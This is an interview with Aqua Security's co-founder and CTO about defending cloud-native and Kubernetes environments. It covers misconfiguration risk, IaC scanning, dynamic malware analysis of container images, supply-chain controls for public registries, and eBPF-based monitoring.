“As with many technologies, with increased usage comes increased risk of sophisticated attacks, particularly those aimed at the supply chain. This is just one area we’re of where we’re seeing an increase in attack severity on cloud native environments, or more specifically, Kubernetes”, says Amir Jerbi, Co-Founder and CTO, Aqua Security in an exclusive interview with ITSecurityWire.
ITSW Bureau: How can organizations secure the configuration of individual cloud services? How does Aqua Security enable them to achieve this?
Amir Jerbi: In the last 12-18 months, cloud adoption has accelerated exponentially, and the infrastructure itself is becoming even more complicated and increasingly difficult to configure correctly. Indeed, the complexity of configurations for cloud services, whether in single or multi-cloud environments, often expose organizations to more severe threats. Even a single cloud service can involve multiple users, roles, and permissions, alongside varying default connections to other services that can be turned on or off.
The burden in managing these configurations, along with added risk of unresolved misconfigurations, increases exponentially in multi-cloud environments. All the while, the consequences of letting misconfigurations continue unresolved are all too real to ignore. Attackers can exploit some misconfigurations to serve as initial access. In contrast, others can be exploited as part of an attack to move laterally across the environment or gain higher privileges. However, the bottom line is these misconfigurations enable bad actors to attack any organization and achieve their nefarious goals, such as stealing invaluable information.
However, a security benefit of the move to cloud native development is the increased use of Infrastructure as Code (IaC) to describe computing environments. IaC is the primary way in which Cloud services are provisioned, and the security begins in the development of IaC.
Once things are described as code, we can shift left and secure our environments before they’re deployed. Aqua’s open source project Trivy, offers IaC security scanning, covering Docker, Kubernetes, and Terraform. IaC scanning tools can be used at multiple stages of the development process, by developers as part of initial authoring or as part of a CI pipeline in a test suite.
ITSW Bureau: Can you suggest some effective ways for organizations to analyze events for security-sensitive changes or potentially malicious activity?
Amir Jerbi: Attackers are quick to adapt to defenses, so as security evolves so too do the attackers’ techniques. Therefore, a key step in protecting any container environment is to implement dynamic threat analysis. Static malware and vulnerability scanning is vital, but it simply cannot be an organization’s last line of defense. After all, bad actors can launch sophisticated attacks that are capable of bypassing all of these tools and file-less malware attacks are increasing in severity – consider the recent attack against Docker Hub. These types of attacks are increasingly difficult to spot and then even more difficult to decipher.
Dynamic tools match the dynamic container environment by analyzing containers as they are running. Images are run in a secure sandbox which enables any malicious elements to be uncovered either before the images are deployed or when a breach has been suspected. Once the malicious images have been detected, dynamic analysis tools can trace them back to the source. This is an important element of forensics for a cloud native environment as it enables the all-important kill chain of the attack to be established post-breach.
Companies must embrace dynamic threat analysis tools and work to build a centralized logging mechanism that can provide complete visibility from end to end. That way, leaders can feel confident that even if they are the next target of a large-scale attack, they will be able to spot it, mitigate it, and prevent it from reoccurring – IT teams can be far more proactive.
ITSW Bureau: How can cybersecurity teams discover sophisticated malware hidden inside open-source packages as well as 3rd party images? How can it help them prevent attacks on container-based applications?
Amir Jerbi: Attackers are increasingly targeting organizations’ software supply chains, and we’re seeing them leverage third-party images as a way to compromise their victims. Here are some recommendations that can help improve security posture:
- Control access to public registries
When running containers from a public registry, treat the registry as a source with a high risk of supply chain attacks. Attackers are trying to trick developers into inadvertently pulling malicious container images by camouflaging them as popular ones. To reduce risk, create a curated internal registry for base container images and limit who can access public registries. Enact policies that ensure container images are vetted before they are included in the internal registry.
- Scan container images for malware using both static and dynamic analysis
Sophisticated attacks are often able to avoid detection when organizations use static, signature- or pattern-based scanning. For example, threat actors can evade detection by embedding code in container images that downloads malware only during runtime.
In addition to scanning any external unvetted container images for vulnerabilities, you need to also use tools that dynamically analyze the container behavior in a sandbox to identify attack vectors that wouldn’t be detected with static code scanning.
- Digitally sign container images or use other methods of maintaining image integrity
It’s important to ensure that the container images in use are the same ones that have been vetted and approved. Using the Aqua Platform, all scanned container images are automatically fingerprinted and tracked, which detects and prevents the use of non-compliant or unknown container images in your environment.
ITSW Bureau: What trends can enterprises expect to see in terms of cloud security posture management?
Amir Jerbi: As with many technologies, with increased usage comes increased risk of sophisticated attacks, particularly those aimed at the supply chain. This is just one area we’re of where we’re seeing an increase in attack severity on cloud-native environments, or more specifically, Kubernetes. In fact, in the last year we’ve seen security professionals being asked to expand their participation within the development and productions environments.
What we have also seen over the past 12 months or so is DevOps teams are now being asked to include more security practices in their work, and security teams are being asked to have more visibility and control into what DevOps are doing – this overlap is creating a new kind of team – what some call DevSecOps.
Naturally, we are seeing the emergence of new monitoring tools to prevent the more severe threats from happening, companies are looking to be more ‘proactive’ with regards to their cybersecurity. One to watch is eBPF – a cutting edge technology with the ability to run sandboxed programs in the Linux kernel without loading kernel modules or altering kernel source code. Developers can run tests and checks at speed without worrying about unintended consequences. In fact, eBPF makes it possible to spot unusual activity and mitigate the danger of an attack. Given the future of work and how businesses are now operating, these monitoring tools will prove vital in the coming months.
Amir is the Co-Founder and CTO of Aqua Security where he brings over 20 years of security software experience in technical leadership positions. Prior to Aqua, he was a Chief Architect at CA Technologies, in charge of the host-based security product line, building enterprise grade security products for Global 1000 companies. Amir has 14 cloud and virtual security patents under his belt.